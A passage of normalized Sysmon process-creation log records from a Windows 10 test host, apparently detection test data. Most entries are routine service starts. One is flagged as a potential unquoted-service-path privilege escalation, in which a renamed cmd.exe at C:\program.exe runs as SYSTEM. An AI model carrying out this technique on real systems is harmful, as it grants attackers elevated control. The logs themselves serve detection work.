xe -k netsvcs -p -s UserManager\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b767-5ea4-0000-00209bd30100", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "Medium", "object.account.session_id": "119707", "object.process.cmdline": "sihost.exe", 
"object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\sihost.exe", "object.process.guid": "747f3d96-b767-5ea4-0000-0010fe2e0200", "object.process.hash.imphash": "D79FA753A3003DE97EDFC038DF32C136", "object.process.hash.md5": "F6A576DCC3EA8F62B8818434B163D25B", "object.process.hash.sha1": "A72247134CA39DA0B1F706F6B339DC912C0EE0D3", "object.process.hash.sha256": "FDF2362A69C542996A8AC84B938DE62CA97AC209762171D2F8B6B543D3A966D0", "object.process.id": "3752", "object.process.meta": "Description:Shell Infrastructure Host | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "sihost.exe", "object.process.original_name": "sihost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s UserManager", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-b765-5ea4-0000-0010dcdf0000", "object.process.parent.id": "1240", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1075 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "119707", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:19.844Z", "type": "raw", "uuid": "dce5ce6a-f275-4831-bcd1-9ef1fa94d3c7"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:28.4656529Z\"},\"EventRecordID\":\"27650\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:18.525\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b766-5ea4-0000-0010baa10100}\"},{\"Name\":\"ProcessId\",\"text\":\"3044\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k LocalService -p -s WdiServiceHost\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\LOCAL 
SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e5030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e5\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e5030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:local service@nt authority", "object.account.name": "local service", "object.account.privileges": "System", "object.account.session_id": "997", "object.process.cmdline": "C:\\Windows\\System32\\svchost.exe -k LocalService -p -s WdiServiceHost", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b766-5ea4-0000-0010baa10100", 
"object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "3044", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:local service@nt authority", "subject.account.name": "local service", "subject.account.privileges": "System", "subject.account.session_id": "997", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:18.525Z", "type": "raw", "uuid": "49942192-9705-41fb-b2ea-bc49d5e7f820"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:28.0960491Z\"},\"EventRecordID\":\"27644\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:18.357\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b766-5ea4-0000-00104a8d0100}\"},{\"Name\":\"ProcessId\",\"text\":\"2900\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b766-5ea4-0000-00104a8d0100", 
"object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "2900", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:18.357Z", "type": "raw", "uuid": "1b11c6bb-3200-4221-8557-2c08bc5b7bf4"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:28.0868370Z\"},\"EventRecordID\":\"27641\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:18.329\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b766-5ea4-0000-0010038a0100}\"},{\"Name\":\"ProcessId\",\"text\":\"2876\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s WpnService\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s WpnService", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b766-5ea4-0000-0010038a0100", "object.process.hash.imphash": 
"247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "2876", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:18.329Z", "type": "raw", "uuid": "a605fca2-3c86-465e-bf9c-8beb3fb08030"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:28.0807172Z\"},\"EventRecordID\":\"27636\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"PrivEsc - Potential Unquoted Service Exploit\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:18.317\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b766-5ea4-0000-0010e7880100}\"},{\"Name\":\"ProcessId\",\"text\":\"2856\"},{\"Name\":\"Image\",\"text\":\"C:\\\\program.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.592 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"Cmd.Exe\"},{\"Name\":\"CommandLine\",\"text\":\"c:\\\\Program Files\\\\vulnsvc\\\\mmm.exe\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "PrivEsc - Potential Unquoted Service Exploit", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "c:\\Program Files\\vulnsvc\\mmm.exe", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\program.exe", "object.process.guid": "747f3d96-b766-5ea4-0000-0010e7880100", 
"object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", "object.process.hash.md5": "975B45B669930B0CC773EAF2B414206F", "object.process.hash.sha1": "8C5437CD76A89EC983E3B364E219944DA3DAB464", "object.process.hash.sha256": "3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.id": "2856", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "program.exe", "object.process.original_name": "Cmd.Exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\", "object.process.version": "10.0.17763.592 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:18.317Z", "type": "raw", "uuid": "cfe86c74-2c29-4618-8dbf-fb8a14b34f3a"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:28.0793247Z\"},\"EventRecordID\":\"27635\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:18.316\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b766-5ea4-0000-0010d4880100}\"},{\"Name\":\"ProcessId\",\"text\":\"2848\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\wlms\\\\wlms.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows License Monitoring Service\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"wlms.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\wlms\\\\wlms.exe\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=42D56EA9DF9576E2193499EE25C27244EAC4ED6B,MD5=4E72A0A91ED9A811FA75A6D8EEC24DE3,SHA256=487A3B61FEFDDC758B2455DF2C8E666D3FCC4E75D8C0A6B56D0AD2732F9F3C48,IMPHASH=C4858787B32BE55BB0085C7B777727C2\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\wlms\\wlms.exe", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\wlms\\wlms.exe", "object.process.guid": "747f3d96-b766-5ea4-0000-0010d4880100", "object.process.hash.imphash": 
"C4858787B32BE55BB0085C7B777727C2", "object.process.hash.md5": "4E72A0A91ED9A811FA75A6D8EEC24DE3", "object.process.hash.sha1": "42D56EA9DF9576E2193499EE25C27244EAC4ED6B", "object.process.hash.sha256": "487A3B61FEFDDC758B2455DF2C8E666D3FCC4E75D8C0A6B56D0AD2732F9F3C48", "object.process.id": "2848", "object.process.meta": "Description:Windows License Monitoring Service | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "wlms.exe", "object.process.original_name": "wlms.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\wlms\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:18.316Z", "type": "raw", "uuid": "b2367921-fb44-4882-97a8-35f69b3114b1"} +{"action": "start", "body": 
